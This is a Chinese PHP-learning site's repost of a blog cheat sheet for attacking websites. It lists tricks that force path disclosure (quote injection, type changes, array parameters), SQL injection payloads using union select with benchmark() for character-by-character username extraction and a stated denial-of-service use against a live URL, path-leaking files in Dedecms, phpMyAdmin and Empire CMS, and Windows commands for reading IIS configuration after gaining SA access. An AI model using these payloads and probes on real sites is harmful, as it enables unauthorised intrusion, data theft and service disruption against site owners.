来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 1、加引号#39;这个最常用2、变参数类型,比如把id=1改为id=a等 有时很有效果3、乱添数据,比如把id=1改为id=1111111111111111111111......等 有时很有效果4、text.php?aa[]=xx5、利用php的max_execution_tim...
|
1、加引号'这个最常用
2、变参数类型,比如把id=1改为id=a等 有时很有效果
3、乱添数据,比如把id=1改为id=1111111111111111111111......等 有时很有效果
4、text.php?aa[]=xx
5、利用php的max_execution_time, 能将绝对路径显示出来. 这机率非常小.适合在服务器负荷严重的时候测试.
6、benchmark(999999999999999999, md5( 'test' )) BENCHMARK(count,expr):BENCHMARK()函数重复countTimes次执行表达式expr,它可以用于计时MySQL处理表达式有多快。结果值总是0。 id=1 union select 1,benchmark(500000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /* 利用找个函数可以作拒绝服务攻击!!http://www.heimian.com/test/test/show.php?id=1%20union%20select%201,1,benchmark(99999999,md5(0x41)),不过前提还是要求可以注射。
Dedecms: www.2cto.com
/member/templets/menulit.php
phpmyadmin:
phpmyadmin/themes/darkblue_orange/layout.inc.php
phpmyadmin/libraries/lect_lang.lib.php phpmyadmin/libraries/mcrypt.lib.php phpmyadmin/libraries/select_lang.lib.php
Empire cms:
e/data/html/memberfhtml.php
Aspx:
~aspx.aspx
SA权限找网站路径
一种思路是 读取iis配置文件 type c:\boot.ini set type C:\WINDOWS\system32\inetsrv\MetaBase.xml win2k是metabase.bin 第二种是用vbs脚本读取虚拟网站的目录 cscript web.vbs
摘自:The Blog of Penker's |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
